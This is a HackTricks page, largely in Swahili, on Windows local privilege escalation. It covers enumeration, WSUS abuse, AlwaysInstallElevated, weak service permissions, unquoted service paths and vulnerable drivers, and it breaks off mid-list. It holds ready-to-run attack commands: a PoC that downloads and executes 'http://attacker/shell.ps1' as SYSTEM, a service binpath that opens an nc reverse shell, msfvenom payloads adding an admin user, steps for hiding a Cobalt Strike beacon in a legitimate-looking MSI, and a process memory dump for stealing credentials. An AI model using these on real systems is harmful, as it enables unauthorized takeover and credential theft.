HackTricks
Windows Local Privilege Escalation
Tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Zana bora ya kutafuta Windows local privilege escalation vectors: WinPEAS
Nadharia ya awali ya Windows
Access Tokens
Ikiwa hujui Windows Access Tokens ni nini, soma ukurasa ufuatao kabla ya kuendelea:
ACLs - DACLs/SACLs/ACEs
Angalia ukurasa ufuatao kupata taarifa zaidi kuhusu ACLs - DACLs/SACLs/ACEs:
Integrity Levels
Ikiwa hujui integrity levels katika Windows ni nini, unapaswa kusoma ukurasa ufuatao kabla ya kuendelea:
Windows Security Controls
Kuna mambo mbalimbali katika Windows ambayo yanaweza kukuzuia kuorodhesha mfumo, kuendesha executables au hata kutambua shughuli zako. Unapaswa kusoma ukurasa ufuatao na kuorodhesha mifumo yote ya kinga kabla ya kuanza uchunguzi wa privilege escalation:
Admin Protection / UIAccess silent elevation
Mchakato za UIAccess zinazozinduliwa kupitia RAiLaunchAdminProcess zinaweza kutumika vibaya kufikia High IL bila onyo wakati AppInfo secure-path checks zimepitiwa. Angalia mtiririko maalum wa bypass wa UIAccess/Admin Protection hapa:
Uiaccess Admin Protection Bypass
System Info
Version info enumeration
Angalia kama toleo la Windows lina udhaifu unaojulikana (angalia pia patches zilizowekwa).
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information
wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get system architecture
[System.Environment]::OSVersion.Version #Current OS version
Get-WmiObject -query 'select * from win32_quickfixengineering' | foreach {$_.hotfixid} #List all patches
Get-Hotfix -description "Security update" #List only "Security Update" patches
Version Exploits
Tovuti hii site ni ya msaada kutafuta taarifa za kina kuhusu Microsoft security vulnerabilities. Hifadhidata hii ina zaidi ya 4,700 security vulnerabilities, ikionyesha massive attack surface ambayo mazingira ya Windows yanatoa.
Kwenye mfumo
- post/windows/gather/enum_patches
- post/multi/recon/local_exploit_suggester
- watson
- winpeas (Winpeas has watson embedded)
Kwenye kompyuta (kwa taarifa za mfumo)
GitHub repos za exploits:
- https://github.com/nomi-sec/PoC-in-GitHub
- https://github.com/abatchy17/WindowsExploits
- https://github.com/SecWiki/windows-kernel-exploits
Mazingira
Je, kuna credential/Juicy info iliyo hifadhiwa katika env variables?
set
dir env:
Get-ChildItem Env: | ft Key,Value -AutoSize
Historia ya PowerShell
ConsoleHost_history #Find the PATH where is saved
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
cat (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath | sls passw
Faili za Transkripti za PowerShell
Unaweza kujifunza jinsi ya kuiwasha hapa: https://sid-500.com/2017/11/07/powershell-enabling-transcription-logging-by-using-group-policy/
#Check is enable in the registry
reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\Transcription
dir C:\Transcripts
#Start a Transcription session
Start-Transcript -Path "C:\transcripts\transcript0.txt" -NoClobber
Stop-Transcript
PowerShell Module Logging
Maelezo ya utekelezaji wa pipeline za PowerShell yanarekodiwa, ikiwa ni pamoja na amri zinazotekelezwa, miito ya amri, na sehemu za scripts. Hata hivyo, maelezo kamili ya utekelezaji na matokeo huenda yasirekodiwa.
Ili kuwezesha hili, fuata maelekezo katika sehemu “Transcript files” ya nyaraka, ukichagua “Module Logging” badala ya “Powershell Transcription”.
reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
Ili kuona matukio 15 ya mwisho kutoka kwenye logi za PowersShell, unaweza kutekeleza:
Get-WinEvent -LogName "windows Powershell" | select -First 15 | Out-GridView
PowerShell Script Block Logging
Rekodi kamili ya shughuli na yaliyomo yote ya utekelezaji wa script huhifadhiwa, ikihakikisha kwamba kila block of code imeandikwa wakati inatekelezwa. Mchakato huu unahifadhi audit trail kamili ya kila shughuli, muhimu kwa forensics na kwa kuchambua tabia haribifu. Kwa kurekodi shughuli zote wakati wa utekelezaji, hupatikana ufahamu wa kina kuhusu mchakato.
reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
Matukio za logi za Script Block zinaweza kupatikana ndani ya Windows Event Viewer kwenye njia: Application and Services Logs > Microsoft > Windows > PowerShell > Operational.
Ili kuona matukio 20 ya mwisho unaweza kutumia:
Get-WinEvent -LogName "Microsoft-Windows-Powershell/Operational" | select -first 20 | Out-Gridview
Mipangilio ya Intaneti
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
Diski
wmic logicaldisk get caption || fsutil fsinfo drives
wmic logicaldisk get caption,description,providername
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
WSUS
Unaweza compromise the system ikiwa updates hazijaombwa kwa kutumia httpS bali http.
Unaanza kwa kukagua ikiwa mtandao unatumia non-SSL WSUS update kwa kuendesha yafuatayo kwenye cmd:
reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer
Au yafuatayo katika PowerShell:
Get-ItemProperty -Path HKLM:\Software\Policies\Microsoft\Windows\WindowsUpdate -Name "WUServer"
Kama ukipata jibu kama mojawapo ya hizi:
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate
WUServer REG_SZ http://xxxx-updxx.corp.internal.com:8535
WUServer : http://xxxx-updxx.corp.internal.com:8530
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\policies\microsoft\windows\windowsupdate
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\policies\microsoft\windows
PSChildName : windowsupdate
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry
Na ikiwa HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer au Get-ItemProperty -Path hklm:\software\policies\microsoft\windows\windowsupdate\au -name "usewuserver" ni sawa na 1.
Then, it is exploitable. Ikiwa registry ya mwisho ni sawa na 0, basi rekodi ya WSUS itapuuzwa.
Ili kutekeleza udhaifu huu unaweza kutumia zana kama: Wsuxploit, pyWSUS - Hizi ni MiTM weaponized exploits scripts za kuingiza ‘fake’ updates katika trafiki ya WSUS isiyotumia SSL.
Read the research here:
WSUS CVE-2020-1013
Read the complete report here.
Kwa ujumla, hili ndilo hitilafu ambayo mdudu huyu unaichunguza:
Ikiwa tuna uwezo wa kubadilisha proxy ya mtumiaji wetu wa ndani, na Windows Updates inatumia proxy iliyosanidiwa katika mipangilio ya Internet Explorer, basi tuna uwezo wa kuendesha PyWSUS kwa ndani ili kukamata trafiki yetu mwenyewe na kuendesha code kama mtumiaji mwenye viwango vya juu kwenye kifaa chetu.
Zaidi ya hayo, kwa kuwa huduma ya WSUS inatumia mipangilio ya mtumiaji wa sasa, pia itatumia certificate store yake. Ikiwa tutaunda self-signed certificate kwa hostname ya WSUS na kuingiza certificate hii kwenye certificate store ya mtumiaji wa sasa, tutaweza kukamata trafiki ya WSUS kwa HTTP na HTTPS. WSUS haina mechanisms kama HSTS-like kutekeleza validation ya aina ya trust-on-first-use kwenye certificate. Ikiwa certificate iliyowasilishwa inatambulika kwa mtumiaji na ina hostname sahihi, itakubaliwa na huduma.
Unaweza kutekeleza udhaifu huu kutumia tool WSUSpicious (mara itakaporuhusiwa).
Third-Party Auto-Updaters and Agent IPC (local privesc)
Wakala wengi wa enterprise huweka uso wa IPC kwenye localhost na njia ya update yenye ruhusa za juu. Ikiwa enrollment inaweza kulazimishwa kwenda kwenye server ya mshambuliaji na updater inaamini rogue root CA au ukaguzi dhaifu wa signer, mtumiaji wa ndani anaweza kuwasilisha MSI mbaya ambayo huduma ya SYSTEM itaweka. Angalia mbinu ya jumla (kulingana na mnyororo wa Netskope stAgentSvc – CVE-2025-0309) hapa:
Veeam Backup & Replication CVE-2023-27532 (SYSTEM via TCP 9401)
Veeam B&R < 11.0.1.1261 inaonyesha huduma ya localhost kwenye TCP/9401 inayosindika ujumbe unaodhibitiwa na mshambuliaji, ikiruhusu amri zozote chini ya NT AUTHORITY\SYSTEM.
- Recon: thibitisha listener na version, kwa mfano,
netstat -ano | findstr 9401na(Get-Item "C:\Program Files\Veeam\Backup and Replication\Backup\Veeam.Backup.Shell.exe").VersionInfo.FileVersion. - Exploit: weka PoC kama
VeeamHax.exepamoja na Veeam DLLs zinazohitajika katika saraka moja, kisha chochea SYSTEM payload kupitia socket ya ndani:
.\VeeamHax.exe --cmd "powershell -ep bypass -c \"iex(iwr http://attacker/shell.ps1 -usebasicparsing)\""
Huduma inatekeleza amri kama SYSTEM.
KrbRelayUp
Kuna udhaifu wa local privilege escalation katika mazingira ya Windows domain chini ya masharti maalum. Masharti haya yanajumuisha mazingira ambapo LDAP signing is not enforced, watumiaji wana self-rights zinazowawezesha kusanidi Resource-Based Constrained Delegation (RBCD), na uwezo wa watumiaji kuunda kompyuta ndani ya domain. Ni muhimu kutambua kuwa haya mahitaji yanatimizwa kwa kutumia mipangilio ya chaguo-msingi.
Pata exploit in https://github.com/Dec0ne/KrbRelayUp
Kwa taarifa zaidi kuhusu mtiririko wa shambulio angalia https://research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation/
AlwaysInstallElevated
Ikiwa hizi 2 za registry ziko zimeteuliwa (value is 0x1), basi watumiaji wa ruhusa yoyote wanaweza kufunga (execute) *.msi files as NT AUTHORITY\SYSTEM.
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Metasploit payloads
msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi-nouac -o alwe.msi #No uac format
msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi -o alwe.msi #Using the msiexec the uac wont be prompted
Ikiwa una meterpreter session unaweza kuendesha kiotomatiki mbinu hii kwa kutumia module exploit/windows/local/always_install_elevated
PowerUP
Tumia amri Write-UserAddMSI kutoka PowerUP kuunda ndani ya current directory Windows MSI binary ili escalate privileges. Skripti hii inaandika precompiled MSI installer ambayo itauliza kuongeza user/group (hivyo utahitaji GIU access):
Write-UserAddMSI
Tekeleza tu binary iliyoundwa ili kuinua ruhusa.
MSI Wrapper
Soma mafunzo haya ili kujifunza jinsi ya kuunda MSI wrapper kwa kutumia zana hizi. Kumbuka unaweza kuwrap faili “.bat” ikiwa unataka just execute command lines
Create MSI with WIX
Create MSI with Visual Studio
- Generate kwa kutumia Cobalt Strike au Metasploit payload mpya ya Windows EXE TCP katika
C:\privesc\beacon.exe - Fungua Visual Studio, chagua Create a new project na andika “installer” kwenye sanduku la utafutaji. Chagua mradi wa Setup Wizard na bonyeza Next.
- Toa jina kwa mradi, kama AlwaysPrivesc, tumia
C:\privesckwa mahali, chagua place solution and project in the same directory, na bonyeza Create. - Endelea kubofya Next hadi ufikie hatua ya 3 ya 4 (chagua faili za kujumuisha). Bonyeza Add na chagua Beacon payload uliyoitengeneza. Kisha bonyeza Finish.
- Weka alama mradi wa AlwaysPrivesc katika Solution Explorer na ndani ya Properties, badilisha TargetPlatform kutoka x86 hadi x64.
- Kuna mali nyingine (properties) unaweza kubadilisha, kama Author na Manufacturer ambazo zinaweza kufanya programu iliyosanikishwa ionekane halali zaidi.
- Bonyeza kulia mradi na chagua View > Custom Actions.
- Bonyeza kulia Install na chagua Add Custom Action.
- Bonyeza mara mbili Application Folder, chagua faili yako ya beacon.exe na bonyeza OK. Hii itahakikisha kwamba beacon payload inatekelezwa mara tu installer inapotekelezwa.
- Chini ya Custom Action Properties, badilisha Run64Bit kuwa True.
- Mwisho, jenga.
- Iwapo onyo
File 'beacon-tcp.exe' targeting 'x64' is not compatible with the project's target platform 'x86'litaonekana, hakikisha umeweka platform kuwa x64.
MSI Installation
Ili kutekeleza installation ya faili hatari .msi kwa background:
msiexec /quiet /qn /i C:\Users\Steve.INFERNO\Downloads\alwe.msi
Ili kutekeleza udhaifu huu unaweza kutumia: exploit/windows/local/always_install_elevated
Antivirus na Vigunduzi
Mipangilio ya Ukaguzi
Mipangilio hii inaamua kinachorekodiwa (logged), hivyo unapaswa kuzingatia
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit
WEF
Windows Event Forwarding, ni ya kuvutia kujua wapi logs zinatumwa
reg query HKLM\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\SubscriptionManager
LAPS
LAPS imeundwa kwa ajili ya management of local Administrator passwords, kuhakikisha kwamba kila password ni unique, randomised, and regularly updated kwenye kompyuta zilizounganishwa kwenye domain. Password hizi zinahifadhiwa kwa usalama ndani ya Active Directory na zinaweza kupatikana tu na watumiaji ambao wamepewa ruhusa za kutosha kupitia ACLs, na kuwaruhusu kuona local admin passwords ikiwa wameidhinishwa.
WDigest
Ikiwa inafanya kazi, plain-text passwords are stored in LSASS (Local Security Authority Subsystem Service).
More info about WDigest in this page.
reg query 'HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' /v UseLogonCredential
LSA Protection
Kuanzia Windows 8.1, Microsoft ilianzisha ulinzi ulioboreshwa kwa Local Security Authority (LSA) ili kuzuia jaribio la michakato isiyo ya kuaminika kusoma kumbukumbu yake au kuingiza code, ikiboresha usalama wa mfumo.
More info about LSA Protection here
reg query 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA' /v RunAsPPL
Credentials Guard
Credential Guard ilianzishwa katika Windows 10. Kusudi lake ni kulinda credentials zilizohifadhiwa kwenye kifaa dhidi ya vitisho kama vile pass-the-hash attacks.| More info about Credentials Guard here.
reg query 'HKLM\System\CurrentControlSet\Control\LSA' /v LsaCfgFlags
Cached Credentials
Domain credentials zinathibitishwa na Local Security Authority (LSA) na zinatumiwa na vipengele vya mfumo wa uendeshaji. Wakati data za kuingia za mtumiaji zinapothibitishwa na registered security package, domain credentials kwa mtumiaji kawaida huanzishwa.
More info about Cached Credentials here.
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON" /v CACHEDLOGONSCOUNT
Watumiaji & Vikundi
Orodhesha Watumiaji & Vikundi
Unapaswa kuangalia ikiwa kuna vikundi vyovyote ambavyo wewe ni mwanachama ambavyo vina ruhusa za kuvutia
# CMD
net users %username% #Me
net users #All local users
net localgroup #Groups
net localgroup Administrators #Who is inside Administrators group
whoami /all #Check the privileges
# PS
Get-WmiObject -Class Win32_UserAccount
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name
Get-LocalGroupMember Administrators | ft Name, PrincipalSource
Privileged groups
Ikiwa uko katika kundi fulani lenye ruhusa za juu unaweza kuwa na uwezo wa kupandisha ruhusa. Jifunze kuhusu makundi yenye ruhusa na jinsi ya kuyatumia vibaya ili kupandisha ruhusa hapa:
Token manipulation
Jifunze zaidi kuhusu nini ni token katika ukurasa huu: Windows Tokens.
Angalia ukurasa ufuatao ili kujifunza kuhusu tokens zenye kuvutia na jinsi ya kuzitumia vibaya:
Logged users / Sessions
qwinsta
klist sessions
Folda za nyumbani
dir C:\Users
Get-ChildItem C:\Users
Sera ya Nenosiri
net accounts
Pata yaliyomo kwenye clipboard
powershell -command "Get-Clipboard"
Michakato Yanayokimbia
Ruhusa za Faili na Folda
Kwanza kabisa, ukiorodhesha michakato angalia kwa ajili ya passwords ndani ya command line ya process.
Angalia kama unaweza overwrite some binary running au ikiwa una ruhusa za kuandika kwenye folda ya binary ili kutumia uwezekano wa DLL Hijacking attacks:
Tasklist /SVC #List processes running and services
tasklist /v /fi "username eq system" #Filter "system" processes
#With allowed Usernames
Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize
#Without usernames
Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id
Daima angalia uwezekano wa electron/cef/chromium debuggers zinakimbia; unaweza kuzitumia ku-escalate privileges.
Kukagua ruhusa za binaries za michakato
for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do (
for /f eol^=^"^ delims^=^" %%z in ('echo %%x') do (
icacls "%%z"
2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo.
)
)
Kukagua ruhusa za folda za binaries za processes (DLL Hijacking)
for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v
"system32"^|find ":"') do for /f eol^=^"^ delims^=^" %%y in ('echo %%x') do (
icacls "%%~dpy\" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users
todos %username%" && echo.
)
Kuchimbaji ya nywila kwenye kumbukumbu
Unaweza kuunda dump ya kumbukumbu ya mchakato unaoendesha kwa kutumia procdump kutoka sysinternals. Huduma kama FTP zina credentials in clear text in memory, jaribu ku-dump kumbukumbu na kusoma credentials.
procdump.exe -accepteula -ma <proc_name_tasklist>
Programu za GUI zisizo salama
Programu zinazoendesha kama SYSTEM zinaweza kuruhusu mtumiaji kuanzisha CMD, au kuvinjari saraka.
Mfano: “Windows Help and Support” (Windows + F1), tafuta “command prompt”, bonyeza “Click to open Command Prompt”
Huduma
Service Triggers huruhusu Windows kuanza huduma wakati masharti fulani yanapotokea (named pipe/RPC endpoint activity, ETW events, IP availability, device arrival, GPO refresh, n.k.). Hata bila haki za SERVICE_START, mara nyingi unaweza kuanzisha huduma zenye ruhusa kwa kuwasha triggers zao. Angalia mbinu za kuorodhesha na kuchochea hapa:
Pata orodha ya huduma:
net start
wmic service list brief
sc query
Get-Service
Ruhusa
Unaweza kutumia sc kupata taarifa kuhusu service
sc qc <service_name>
Inashauriwa kuwa na binary accesschk kutoka Sysinternals ili kuangalia kiwango kinachohitajika cha ruhusa kwa kila huduma.
accesschk.exe -ucqv <Service_Name> #Check rights for different groups
Inashauriwa kuangalia ikiwa “Authenticated Users” wanaweza kubadilisha huduma yoyote:
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -uwcqv %USERNAME% * /accepteula
accesschk.exe -uwcqv "BUILTIN\Users" * /accepteula 2>nul
accesschk.exe -uwcqv "Todos" * /accepteula ::Spanish version
You can download accesschk.exe for XP for here
Wezesha huduma
Ikiwa unapata kosa hili (kwa mfano na SSDPSRV):
Kosa la mfumo 1058 limetokea.
Huduma haiwezi kuanzishwa, kwa sababu imelemazwa au haina vifaa vilivyowezeshwa vinavyohusishwa nayo.
Unaweza kuiwezesha kwa kutumia
sc config SSDPSRV start= demand
sc config SSDPSRV obj= ".\LocalSystem" password= ""
Chukua katika akaunti kwamba huduma upnphost inategemea SSDPSRV ili kufanya kazi (kwa XP SP1)
Njia mbadala nyingine ya tatizo hili ni kuendesha:
sc.exe config usosvc start= auto
Badilisha njia ya binari ya huduma
Katika hali ambapo kikundi cha “Authenticated users” kina SERVICE_ALL_ACCESS kwenye huduma, inawezekana kubadilisha binari inayotekelezwa ya huduma. Ili kubadilisha na kutekeleza sc:
sc config <Service_Name> binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
sc config <Service_Name> binpath= "net localgroup administrators username /add"
sc config <Service_Name> binpath= "cmd \c C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe"
sc config SSDPSRV binpath= "C:\Documents and Settings\PEPE\meter443.exe"
Anzisha upya huduma
wmic service NAMEOFSERVICE call startservice
net stop [service name] && net start [service name]
Ruhusa zinaweza kupandishwa hadhi kupitia idhini mbalimbali:
- SERVICE_CHANGE_CONFIG: Inaruhusu upya usanidi wa binary ya service.
- WRITE_DAC: Inaruhusu upya idhini, hivyo ukapata uwezo wa kubadilisha usanidi za service.
- WRITE_OWNER: Inaruhusu kunyakua umiliki na upya usanidi wa idhini.
- GENERIC_WRITE: Inarithi uwezo wa kubadilisha usanidi za service.
- GENERIC_ALL: Pia inarithi uwezo wa kubadilisha usanidi za service.
Kwa ajili ya utambuzi na matumizi ya udhaifu huu, exploit/windows/local/service_permissions inaweza kutumika.
Ruhusa dhaifu za binaries za service
Kagua kama unaweza kubadilisha binary inayotekelezwa na service au ikiwa una write permissions on the folder ambapo binary iko (DLL Hijacking).
Unaweza kupata kila binary inayotekelezwa na service ukitumia wmic (si ndani ya system32) na kukagua idhini zako ukitumia icacls:
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> %temp%\perm.txt
for /f eol^=^"^ delims^=^" %a in (%temp%\perm.txt) do cmd.exe /c icacls "%a" 2>nul | findstr "(M) (F) :\"
Unaweza pia kutumia sc na icacls:
sc query state= all | findstr "SERVICE_NAME:" >> C:\Temp\Servicenames.txt
FOR /F "tokens=2 delims= " %i in (C:\Temp\Servicenames.txt) DO @echo %i >> C:\Temp\services.txt
FOR /F %i in (C:\Temp\services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> C:\Temp\path.txt
Ruhusa za kubadilisha rejista ya huduma
Unapaswa kukagua ikiwa unaweza kubadilisha rejista yoyote ya huduma.
Unaweza kukagua uruhusa zako juu ya rejista ya huduma kwa kufanya:
reg query hklm\System\CurrentControlSet\Services /s /v imagepath #Get the binary paths of the services
#Try to write every service with its current content (to check if you have write permissions)
for /f %a in ('reg query hklm\system\currentcontrolset\services') do del %temp%\reg.hiv 2>nul & reg save %a %temp%\reg.hiv 2>nul && reg restore %a %temp%\reg.hiv 2>nul && echo You can modify %a
get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i "<Username> Users Path Everyone"
Inapaswa kukaguliwa ikiwa Authenticated Users au NT AUTHORITY\INTERACTIVE wana ruhusa za FullControl. Ikiwa ndivyo, binary inayotekelezwa na service inaweza kubadilishwa.
Ili kubadilisha Path ya binary inayotekelezwa:
reg add HKLM\SYSTEM\CurrentControlSet\services\<service_name> /v ImagePath /t REG_EXPAND_SZ /d C:\path\new\binary /f
Services registry AppendData/AddSubdirectory permissions
Ikiwa una ruhusa hii juu ya rejista hii inamaanisha kwamba unaweza kuunda rejista ndogo kutoka hii. Katika kesi ya Windows services hii ni ya kutosha kutekeleza msimbo wowote:
AppendData/AddSubdirectory permission over service registry
Unquoted Service Paths
Ikiwa njia ya executable haiko ndani ya nukuu, Windows itajaribu kutekeleza kila sehemu inayomalizika kabla ya nafasi.
For example, for the path C:\Program Files\Some Folder\Service.exe Windows will try to execute:
C:\Program.exe
C:\Program Files\Some.exe
C:\Program Files\Some Folder\Service.exe
Orodhesha service paths zote zisizo na nukuu, isipokuwa zile za built-in Windows services:
wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows" | findstr /i /v '\"'
wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\Windows\system32" | findstr /i /v '\"' # Not only auto services
# Using PowerUp.ps1
Get-ServiceUnquoted -Verbose
for /f "tokens=2" %%n in ('sc query state^= all^| findstr SERVICE_NAME') do (
for /f "delims=: tokens=1*" %%r in ('sc qc "%%~n" ^| findstr BINARY_PATH_NAME ^| findstr /i /v /l /c:"c:\windows\system32" ^| findstr /v /c:"\""') do (
echo %%~s | findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (echo %%n && echo %%~s && icacls %%s | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%") && echo.
)
)
gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
Unaweza kutambua na exploit udhaifu huu kwa kutumia metasploit: exploit/windows/local/trusted\_service\_path Unaweza kuunda binary ya huduma kwa mkono kwa kutumia metasploit:
msfvenom -p windows/exec CMD="net localgroup administrators username /add" -f exe-service -o service.exe
Hatua za Urejeshaji
Windows inaruhusu watumiaji kubainisha hatua zitakazochukuliwa ikiwa huduma itashindwa. Kipengele hiki kinaweza kusanidiwa kuonyesha binary. Ikiwa binary hii inaweza kubadilishwa, inaweza kuwezekana kupata privilege escalation. Maelezo zaidi yanapatikana katika nyaraka rasmi.
Programu
Programu Zilizosakinishwa
Angalia ruhusa za binaries (labda unaweza kuibadilisha moja na kupata privilege escalation) na za folda (DLL Hijacking).
dir /a "C:\Program Files"
dir /a "C:\Program Files (x86)"
reg query HKEY_LOCAL_MACHINE\SOFTWARE
Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name
Ruhusa za Kuandika
Angalia kama unaweza kubadilisha config file ili kusoma faili maalum au kama unaweza kubadilisha binary itakayotekelezwa na akaunti ya Administrator (schedtasks).
Njia ya kutafuta ruhusa dhaifu za folda/faili katika mfumo ni kufanya:
accesschk.exe /accepteula
# Find all weak folder permissions per drive.
accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\
accesschk.exe -uwdqs "Everyone" c:\
# Find all weak file permissions per drive.
accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*
accesschk.exe -uwdqs "Everyone" c:\*.*
icacls "C:\Program Files\*" 2>nul | findstr "(F) (M) :\" | findstr ":\ everyone authenticated users todos %username%"
icacls ":\Program Files (x86)\*" 2>nul | findstr "(F) (M) C:\" | findstr ":\ everyone authenticated users todos %username%"
Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'Everyone'} } catch {}}
Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'BUILTIN\Users'} } catch {}}
Notepad++ plugin autoload persistence/execution
Notepad++ hu-inaloadi DLL yoyote ya plugin chini ya subfolder zake za plugins. Ikiwa kuna portable/copy install inayoweza kuandikwa, kuachilia plugin hasidi kunatoa utekelezaji wa msimbo kiotomatiki ndani ya notepad++.exe kila mara inapoanzishwa (ikiwemo kutoka DllMain na plugin callbacks).
Notepad Plus Plus Plugin Autoload Persistence
Run at startup
Angalia kama unaweza kuandika juu ya registry au binary ambayo itatekelezwa na mtumiaji mwingine.
Soma ukurasa ufuatao ili ujifunze zaidi kuhusu maeneo ya kuvutia ya autoruns locations to escalate privileges:
Privilege Escalation with Autoruns
Drivers
Tafuta drivers za third party weird/vulnerable zinazowezekana
driverquery
driverquery.exe /fo table
driverquery /SI
Ikiwa driver inaonyesha arbitrary kernel read/write primitive (ya kawaida katika poorly designed IOCTL handlers), unaweza kupandisha haki kwa kuiba SYSTEM token moja kwa moja kutoka kernel memory. Tazama mbinu hatua‑kwa‑hatua hapa:
Arbitrary Kernel Rw Token Theft
Kwa bugs za race-condition ambapo call iliyo na udhaifu hufungua attacker-controlled Object Manager path, kupunguza kwa makusudi lookup (kwa kutumia max-length components au deep directory chains) kunaweza kupanua dirisha kutoka microseconds hadi tens of microseconds:
Kernel Race Condition Object Manager Slowdown
Registry hive memory corruption primitives
Modern hive vulnerabilities zinakuwezesha kupanga deterministic layouts, kutumia writable HKLM/HKU descendants, na kubadilisha metadata corruption kuwa kernel paged-pool overflows bila custom driver. Jifunze mnyororo mzima hapa:
Windows Registry Hive Exploitation
Abusing missing FILE_DEVICE_SECURE_OPEN on device objects (LPE + EDR kill)
Baadhi ya signed third‑party drivers huunda device object yao na SDDL thabiti kupitia IoCreateDeviceSecure lakini husahau kuweka FILE_DEVICE_SECURE_OPEN katika DeviceCharacteristics. Bila flag hii, secure DACL haiwekiwi wakati device inafunguliwa kupitia path inayojumuisha component ya ziada, ikiruhusu mtumiaji yoyote asiye na haki kupata handle kwa kutumia namespace path kama:
- \ .\DeviceName\anything
- \ .\amsdk\anyfile (from a real-world case)
